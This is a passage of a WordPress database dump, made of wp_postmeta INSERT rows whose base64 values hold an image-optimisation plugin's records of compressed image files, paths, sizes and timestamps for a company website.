jExMTk2NjUyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTA0LCJ0aW1lIjoxNDgzNTg1OTU5LCJpZCI6NTY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxNjExMTk2NjUyLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTYxLCJpZCI6NTY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi0yNDd4MjUwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTItMjQ3eDI1MC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjI1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxNjExMTk2NjUyLTI0N3gyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTYzLCJpZCI6NTY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi0zMDB4MjUwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTItMzAweDI1MC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjI1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxNjExMTk2NjUyLTMwMHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTY1LCJpZCI6NTY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi00MDB4MjUwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTItNDAweDI1MC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjI1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxNjExMTk2NjUyLTQwMHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTY3LCJpZCI6NTY2fV0='); 
INSERT INTO `wp_postmeta` VALUES (30163, 565, 'wpfc_optimisation_reduction', '1985'); 
INSERT INTO `wp_postmeta` VALUES (30164, 565, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTIuanBnIiwid2lkdGgiOjQ1MCwiaGVpZ2h0IjoyNTAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0yLmpwZyIsInJlZHVjdGlvbiI6MTg2MCwidGltZSI6MTQ4MzU4NTk3NCwiaWQiOiI1NjUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTItMzQweDI1MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvMi0yLTM0MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6bzItMi0zNDB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTk3NiwiaWQiOjU2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvMi0yLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem8yLTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU5NzgsImlkIjo1NjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0yLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTgwLCJpZCI6NTY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvMi0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6bzItMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTk4MiwiaWQiOjU2NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTItMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvMi0yLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6bzItMi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTE3LCJ0aW1lIjoxNDgzNTg1OTg0LCJpZCI6NTY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0yLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTg2LCJpZCI6NTY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMi0yNDd4MjUwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTItMjQ3eDI1MC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjI1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0yLTI0N3gyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTg4LCJpZCI6NTY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMi0zMDB4MjUwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTItMzAweDI1MC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjI1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0yLTMwMHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTkwLCJpZCI6NTY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMi00MDB4MjUwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTItNDAweDI1MC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjI1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0yLTQwMHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTkzLCJpZCI6NTY1fV0='); 
INSERT INTO `wp_postmeta` VALUES (30165, 555, 'wpfc_optimisation_reduction', '882'); 
INSERT INTO `wp_postmeta` VALUES (30166, 555, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X3JlZC1lMTQ3MTU3MTkyMjQ2Ny5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveF9yZWQtZTE0NzE1NzE5MjI0NjcuanBnIiwid2lkdGgiOjMyMCwiaGVpZ2h0IjoxMzUsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3hfcmVkLWUxNDcxNTcxOTIyNDY3LmpwZyIsInJlZHVjdGlvbiI6ODc1LCJ0aW1lIjoxNDgzNTg1OTk5LCJpZCI6IjU1NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X3JlZC1lMTQ3MTU3MTkyMjQ2Ny0yNTB4MTM1LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTM1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveF9yZWQtZTE0NzE1NzE5MjI0NjctMjUweDEzNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3hfcmVkLWUxNDcxNTcxOTIyNDY3LTI1MHgxMzUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MDAxLCJpZCI6NTU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveF9yZWQtZTE0NzE1NzE5MjI0NjctMjAweDEzNS5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjEzNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfcmVkLWUxNDcxNTcxOTIyNDY3LTIwMHgxMzUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94X3JlZC1lMTQ3MTU3MTkyMjQ2Ny0yMDB4MTM1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjAwMywiaWQiOjU1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfcmVkLWUxNDcxNTcxOTIyNDY3LTIyNXgxMzUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxMzUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X3JlZC1lMTQ3MTU3MTkyMjQ2Ny0yMjV4MTM1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveF9yZWQtZTE0NzE1NzE5MjI0NjctMjI1eDEzNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwMDUsImlkIjo1NTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfcmVkLWUxNDcxNTcxOTIyNDY3LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X3JlZC1lMTQ3MTU3MTkyMjQ2Ny0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveF9yZWQtZTE0NzE1NzE5MjI0NjctMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwMDcsImlkIjo1NTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfcmVkLWUxNDcxNTcxOTIyNDY3LTE4MHgxMzUuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X3JlZC1lMTQ3MTU3MTkyMjQ2Ny0xODB4MTM1LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTM1IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveF9yZWQtZTE0NzE1NzE5MjI0NjctMTgweDEzNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwMDksImlkIjo1NTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfcmVkLWUxNDcxNTcxOTIyNDY3LTI0N3gxMzUuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X3JlZC1lMTQ3MTU3MTkyMjQ2Ny0yNDd4MTM1LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMTM1IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveF9yZWQtZTE0NzE1NzE5MjI0NjctMjQ3eDEzNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwMTEsImlkIjo1NTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfcmVkLWUxNDcxNTcxOTIyNDY3LTMwMHgxMzUuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X3JlZC1lMTQ3MTU3MTkyMjQ2Ny0zMDB4MTM1LmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMTM1IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveF9yZWQtZTE0NzE1NzE5MjI0NjctMzAweDEzNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwMTMsImlkIjo1NTV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30167, 554, 'wpfc_optimisation_reduction', '800'); 
INSERT INTO `wp_postmeta` VALUES (30168, 554, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94YXV0aDItZTE0NzE1NzE2MjUzOTQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hhdXRoMi1lMTQ3MTU3MTYyNTM5NC5qcGciLCJ3aWR0aCI6MzA1LCJoZWlnaHQiOjEzMywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveGF1dGgyLWUxNDcxNTcxNjI1Mzk0LmpwZyIsInJlZHVjdGlvbiI6NzkxLCJ0aW1lIjoxNDgzNTg2MDIwLCJpZCI6IjU1NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94YXV0aDItZTE0NzE1NzE2MjUzOTQtMjUweDEzMy5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjEzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hhdXRoMi1lMTQ3MTU3MTYyNTM5NC0yNTB4MTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveGF1dGgyLWUxNDcxNTcxNjI1Mzk0LTI1MHgxMzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MDIyLCJpZCI6NTU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveGF1dGgyLWUxNDcxNTcxNjI1Mzk0LTIwMHgxMzMuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxMzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94YXV0aDItZTE0NzE1NzE2MjUzOTQtMjAweDEzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3hhdXRoMi1lMTQ3MTU3MTYyNTM5NC0yMDB4MTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjAyNCwiaWQiOjU1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hhdXRoMi1lMTQ3MTU3MTYyNTM5NC0yMjV4MTMzLmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveGF1dGgyLWUxNDcxNTcxNjI1Mzk0LTIyNXgxMzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94YXV0aDItZTE0NzE1NzE2MjUzOTQtMjI1eDEzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwMjYsImlkIjo1NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnN